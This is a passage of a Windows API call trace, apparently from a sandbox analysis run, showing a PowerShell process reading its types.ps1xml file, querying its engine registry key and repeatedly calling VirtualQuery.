lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0134.415] SetErrorMode (uMode=0x1) returned 0x1 [0134.415] SetErrorMode (uMode=0x1) returned 0x1 [0134.416] GetFileType (hFile=0x330) returned 0x1 [0134.416] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.418] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.418] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.418] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.418] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.419] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.419] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.419] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.419] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.420] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.420] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.420] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.420] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.420] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.420] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.420] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.421] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.422] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.422] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.422] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.422] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.422] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.423] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.423] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.423] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.423] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.423] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.424] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.424] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.424] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.424] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.425] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.425] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.427] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.427] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.427] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.427] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.427] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.428] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.428] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.428] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.428] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1b4, lpOverlapped=0x0) returned 1 [0134.428] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x0, lpOverlapped=0x0) returned 1 [0134.429] CloseHandle (hObject=0x330) returned 1 [0134.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0134.429] SetErrorMode (uMode=0x1) returned 0x1 [0134.429] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd240 | out: lpFileInformation=0xcd240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0134.429] SetErrorMode (uMode=0x1) returned 0x1 [0134.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0134.429] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd328 | out: phkResult=0xcd328*=0x330) returned 0x0 [0134.429] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd2ac, lpData=0x0, lpcbData=0xcd2a8*=0x0 | out: lpType=0xcd2ac*=0x1, lpData=0x0, lpcbData=0xcd2a8*=0x56) returned 0x0 [0134.429] CoTaskMemAlloc (cb=0x5a) returned 0x1b80a7b0 [0134.429] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd27c, lpData=0x1b80a7b0, lpcbData=0xcd278*=0x56 | out: lpType=0xcd27c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd278*=0x56) returned 0x0 [0134.429] CoTaskMemFree (pv=0x1b80a7b0) [0134.430] RegCloseKey (hKey=0x330) returned 0x0 [0134.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0134.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0134.817] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.918] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.921] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.921] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.922] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.922] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.923] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.927] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.937] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.938] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.938] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.939] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.940] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.941] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.942] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.943] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.948] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.952] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.952] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.953] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.953] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.953] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.953] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.953] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.954] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.954] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.954] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.954] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.955] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.955] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.956] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.958] VirtualQuery (in: lpAddress=0xcc020, lpBuffer=0xccee0, dwLength=0x30 | out: lpBuffer=0xccee0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.958] VirtualQuery (in: lpAddress=0xcc020, lpBuffer=0xccee0, dwLength=0x30 | out: lpBuffer=0xccee0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.958] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.959] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.089] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.091] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.092] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.118] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.118] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.118] CoTaskMemFree (pv=0x10ccc0) [0135.128] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, 